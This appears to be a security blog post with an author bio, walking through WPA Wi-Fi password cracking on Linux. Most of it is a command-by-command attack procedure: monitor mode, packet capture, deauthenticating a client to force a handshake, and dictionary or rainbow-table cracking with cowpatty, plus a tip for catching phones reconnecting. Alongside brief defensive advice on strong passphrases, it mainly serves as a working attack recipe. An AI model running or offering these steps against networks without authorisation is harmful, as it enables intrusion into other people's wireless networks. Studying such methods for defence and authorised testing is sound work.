It is interesting how many people believe that their wireless is secure because they are using WPA. Well we did a test recently and were able to basically password guess our way with a dictionary attack using either a straight dictionary or a rainbow table. The cool thing is I bought an ALFA usb antenna and could sit down at the corner coffee place and still see my wireless access point.
Security people: Be sure that your WPA password is an unreadable string not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs the tables of today are too intelligent for that.
In a nutshell using linux this is how it is done:
Part I
airmon-ng start wlan0 (this puts the wireless car in promiscuous mode)
kismet -c wlan0
â¢close console window to see collection of packets
â¢use alt + k to get to top pull down menu’s, turn on ability to see type of access points bsid and guess at IP address, channel #
Cntrl-C to exit kismet
airmon-ng stop wlan0
Part II
airmon-ng start wlan0
airodump-ng -c
Example:
airodump-ng -c 9 -bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0 * Note D-Link-01.cap is where the capture of all traffic will go
Now open another window as we need to force a re-conect from the target (see the Note below)
aireplay-ng
Example:
airepley-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0
You will see at the top of the airodump window a wpa re-key, capture some traffic and exit you will have captured all the trafic in the D-Link01.cap file.
Part III
Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables
If using hashes (rainbow)
cowpatty -r
Example:
cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite
If using Dictionary words:
cowpatty -r
Example:
cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite
Note : If you are in an environment that has alot of cell phones like the iphone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless ethernet card has a wake-up when the screen is activated. So you don’t need to send de-auth all you got to do is hang around long enough for someone to touch their Iphone or whatever cell and have it wake up it’s wireless and re-auth to the network, in other words there is the weakest link! — LOL!
Happy Cracking
As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY–I’m Out
~Mark Bennett
Hacking the WPA Airwaves
Paul Asadoorian
Paul Asadoorian is currently the Principal Security Evangelist for Eclypsium, focused on firmware and supply chain security awareness. Paul’s passion for firmware security extends back many years to the WRT54G hacking days and reverse engineering firmware on IoT devices for fun. Paul and his long-time podcast co-host Larry Pesce co-authored the book “WRTG54G Ultimate Hacking” in 2007, which fueled the firmware hacking fire even more. Paul has worked in technology and information security for over 20 years, holding various security and engineering roles in a lottery company, university, ISP, independent penetration tester, and security product companies such as Tenable. In 2005 Paul founded Security Weekly, a weekly podcast dedicated to hacking and information security. In 2020 Security Weekly was acquired by the Cyberrisk Alliance. Paul is still the host of one of the longest-running security podcasts, Paul’s Security Weekly, he enjoys coding in Python & telling everyone he uses Linux.
